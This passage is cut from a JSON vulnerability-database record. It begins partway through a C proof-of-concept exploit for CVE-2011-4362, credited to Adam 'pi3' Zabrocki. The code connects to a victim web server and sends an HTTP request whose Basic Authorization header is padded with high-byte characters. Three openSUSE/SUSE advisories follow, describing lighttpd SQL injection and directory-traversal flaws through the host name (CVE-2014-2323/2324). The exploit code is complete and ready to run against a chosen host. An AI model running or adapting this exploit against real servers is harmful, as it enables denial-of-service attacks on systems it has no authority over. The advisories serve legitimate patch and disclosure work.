deflate\\r\\n\"\r\n\"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\\r\\n\"\r\n\"Proxy-Connection: keep-alive\\r\\n\"\r\n\"Authorization: Basic \";\r\n\r\n\r\nint main(int argc, char *argv[]) {\r\n\r\n int i=PORT,opt=0,sockfd;\r\n char *remote_dir = NULL;\r\n char *r_hostname = NULL;\r\n struct sockaddr_in servaddr;\r\n struct hostent *h = NULL;\r\n char *buf;\r\n unsigned int len = 0x0;\r\n\r\n\r\n if (!argv[1])\r\n usage(argv[0]);\r\n\r\n\r\n printf(\"\\n\\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::...\\n\");\r\n printf(\"\\n\\t\\t[+] Preparing arguments... \");\r\n while((opt = getopt(argc,argv,\"h:d:p:?\")) != -1) {\r\n switch(opt) {\r\n\r\n case 'h':\r\n\r\n r_hostname = strdup(optarg);\r\n if ( (h = gethostbyname(r_hostname))==NULL) {\r\n printf(\"Gethostbyname() field!\\n\");\r\n exit(-1);\r\n }\r\n break;\r\n\r\n case 'p':\r\n\r\n i=atoi(optarg);\r\n break;\r\n\r\n case 'd':\r\n\r\n remote_dir = strdup(optarg);\r\n break;\r\n\r\n case '?':\r\n\r\n usage(argv[0]);\r\n break;\r\n\r\n default:\r\n\r\n usage(argv[0]);\r\n break;\r\n\r\n }\r\n }\r\n\r\n if (!remote_dir || !h) {\r\n usage(argv[0]);\r\n exit(-1);\r\n }\r\n\r\n servaddr.sin_family = AF_INET;\r\n servaddr.sin_port = htons(i);\r\n servaddr.sin_addr = *(struct in_addr*)h->h_addr;\r\n\r\n len = strlen(header_port)+strlen(remote_dir)+strlen(r_hostname)+512;\r\n if ( (buf = (char *)malloc(len)) == NULL) {\r\n printf(\"malloc() :(\\n\");\r\n exit(-1);\r\n }\r\n memset(buf,0x0,len);\r\n\r\n if (i != 80)\r\n snprintf(buf,len,header_port,remote_dir,r_hostname,i);\r\n else\r\n snprintf(buf,len,header,remote_dir,r_hostname);\r\n\r\n for (i=0;i<130;i++)\r\n buf[strlen(buf)] = 127+i;\r\n\r\n buf[strlen(buf)] = '\\r';\r\n buf[strlen(buf)] = '\\n';\r\n buf[strlen(buf)] = '\\r';\r\n buf[strlen(buf)] = '\\n';\r\n\r\n printf(\"OK\\n\\t\\t[+] Creating socket... \");\r\n if ( (sockfd=socket(AF_INET,SOCK_STREAM,0)) < 0 ) {\r\n printf(\"Socket() error!\\n\");\r\n exit(-1);\r\n }\r\n\r\n printf(\"OK\\n\\t\\t[+] Connecting to [%s]... \",r_hostname);\r\n if ( (connect(sockfd,(SA*)&servaddr,sizeof(servaddr)) ) < 0 ) {\r\n printf(\"Connect() error!\\n\");\r\n exit(-1);\r\n }\r\n\r\n printf(\"OK\\n\\t\\t[+] Sending dirty packet... \");\r\n// write(1,buf,strlen(buf));\r\n write(sockfd,buf,strlen(buf));\r\n\r\n printf(\"OK\\n\\n\\t\\t[+] Check the website!\\n\\n\");\r\n\r\n close(sockfd);\r\n\r\n}\r\n\r\nint usage(char *arg) {\r\n\r\n printf(\"\\n\\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::...\\n\");\r\n printf(\"\\n\\tUsage: %s <options>\\n\\n\\t\\tOptions:\\n\",arg);\r\n printf(\"\\t\\t\\t -v <victim>\\n\\t\\t\\t -p <port>\\n\\t\\t\\t -d <remote_dir_for_auth>\\n\\n\");\r\n exit(0);\r\n}\r\n\r\n\r\n\n\n# 0day.today [2018-01-03] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/17319"}], "suse": [{"lastseen": "2016-09-04T12:39:55", "bulletinFamily": "unix", "description": "lighttpd was updated to version 1.4.35, fixing bugs and\n security issues:\n\n CVE-2014-2323: SQL injection vulnerability in\n mod_mysql_vhost.c in lighttpd allowed remote attackers to\n execute arbitrary SQL commands via the host name, related\n to request_check_hostname.\n\n CVE-2014-2323: Multiple directory traversal vulnerabilities\n in (1) mod_evhost and (2) mod_simple_vhost in lighttpd\n allowed remote attackers to read arbitrary files via a ..\n (dot dot) in the host name, related to\n request_check_hostname.\n\n More information can be found on the lighttpd advisory\n page:\n <a rel=\"nofollow\" href=\"http://download.lighttpd.net/lighttpd/security/lighttpd_sa_2\">http://download.lighttpd.net/lighttpd/security/lighttpd_sa_2</a>\n 014_01.txt\n\n Other changes:\n * [network/ssl] fix build error if TLSEXT is disabled\n * [mod_fastcgi] fix use after free (only triggered if\n fastcgi debug is active)\n * [mod_rrdtool] fix invalid read (string not null\n terminated)\n * [mod_dirlisting] fix memory leak if pcre fails\n * [mod_fastcgi,mod_scgi] fix resource leaks on spawning\n backends\n * [mod_magnet] fix memory leak\n * add comments for switch fall throughs\n * remove logical dead code\n * [buffer] fix length check in buffer_is_equal_right_len\n * fix resource leaks in error cases on config parsing and\n other initializations\n * add force_assert() to enforce assertions as simple\n assert()s are disabled by -DNDEBUG (fixes #2546)\n * [mod_cml_lua] fix null pointer dereference\n * force assertion: setting FD_CLOEXEC must work (if\n available)\n * [network] check return value of lseek()\n * fix unchecked return values from\n stream_open/stat_cache_get_entry\n * [mod_webdav] fix logic error in handling file creation\n error\n * check length of unix domain socket filenames\n * fix SQL injection / host name validation (thx Jann Horn)\n for all the changes see\n /usr/share/doc/packages/lighttpd/NEWS\n\n", "modified": "2014-03-26T17:04:44", "published": "2014-03-26T17:04:44", "id": "OPENSUSE-SU-2014:0449-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-03/msg00023.html", "title": "lighttpd to 1.4.35 (important)", "type": "suse", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T12:43:05", "bulletinFamily": "unix", "description": "The HTTP server lighttpd was updated to fix the following\n security issues:\n\n * CVE-2014-2323: SQL injection vulnerability in\n mod_mysql_vhost.c in lighttpd allowed remote attackers to\n execute arbitrary SQL commands via the host name.\n * CVE-2014-2323: Multiple directory traversal\n vulnerabilities in mod_evhost and mod_simple_vhost in\n lighttpd allowed remote attackers to read arbitrary files\n via .. (dot dot) in the host name.\n\n More information can be found on the lighttpd advisory\n page:\n <a rel=\"nofollow\" href=\"http://download.lighttpd.net/lighttpd/security/lighttpd_sa_2\">http://download.lighttpd.net/lighttpd/security/lighttpd_sa_2</a>\n 014_01.txt\n <<a rel=\"nofollow\" href=\"http://download.lighttpd.net/lighttpd/security/lighttpd_sa_\">http://download.lighttpd.net/lighttpd/security/lighttpd_sa_</a>\n 2014_01.txt>\n\n Security Issues references:\n\n * CVE-2014-2323\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2323\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2323</a>\n >\n * CVE-2014-2324\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2324\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2324</a>\n >\n\n", "modified": "2014-04-03T19:04:18", "published": "2014-04-03T19:04:18", "id": "SUSE-SU-2014:0474-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-04/msg00002.html", "type": "suse", "title": "Security update for lighttpd (important)", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T12:10:59", "bulletinFamily": "unix", "description": "lighttpd was updated to version 1.4.35, fixing bugs and\n security issues:\n\n CVE-2014-2323: SQL injection vulnerability in\n mod_mysql_vhost.c in lighttpd allowed remote attackers to\n execute arbitrary SQL commands via the host name, related\n to request_check_hostname.\n\n CVE-2014-2323: Multiple directory traversal vulnerabilities\n in (1) mod_evhost and (2) mod_simple_vhost in lighttpd\n allowed remote attackers to read arbitrary files via a ..\n (dot dot) in the host name, related to\n request_check_hostname.\n\n More information can be found on the lighttpd advisory\n page:\n <a rel=\"nofollow\" href=\"http://download.lighttpd.net/lighttpd/security/lighttpd_sa_2\">http://download.lighttpd.net/lighttpd/security/lighttpd_sa_2</a>\n 014_01.txt\n\n Other changes:\n * [network/ssl] fix build error if TLSEXT is disabled\n * [mod_fastcgi] fix use after free (only triggered if\n fastcgi debug is active)\n * [mod_rrdtool] fix invalid read (string not null\n terminated)\n * [mod_dirlisting] fix memory leak if pcre fails\n * [mod_fastcgi,mod_scgi] fix resource leaks on spawning\n backends\n * [mod_magnet] fix memory leak\n * add comments for switch fall throughs\n * remove logical dead code\n * [buffer] fix length check in buffer_is_equal_right_len\n * fix resource leaks in error cases on config parsing and\n other initializations\n * add force_assert() to enforce assertions as simple\n assert()s are disabled by -DNDEBUG (fixes #2546)\n * [mod_cml_lua] fix null pointer dereference\n * force assertion: setting FD_CLOEXEC must work (if\n available)\n * [network] check return value of lseek()\n * fix unchecked return values from\n stream_open/stat_cache_get_entry\n * [mod_webdav] fix logic error in handling file creation\n error\n * check length of unix domain socket filenames\n * fix SQL injection / host name validation (thx Jann\n Horn)for all the changes see\n /usr/share/doc/packages/lighttpd/NEWS\n\n", "modified": "2014-04-08T21:06:06", "published": "2014-04-08T21:06:06", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-04/msg00006.html", "id": "OPENSUSE-SU-2014:0496-1", "type": "suse", "title": "lighttpd to 1.4.35 (important)", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}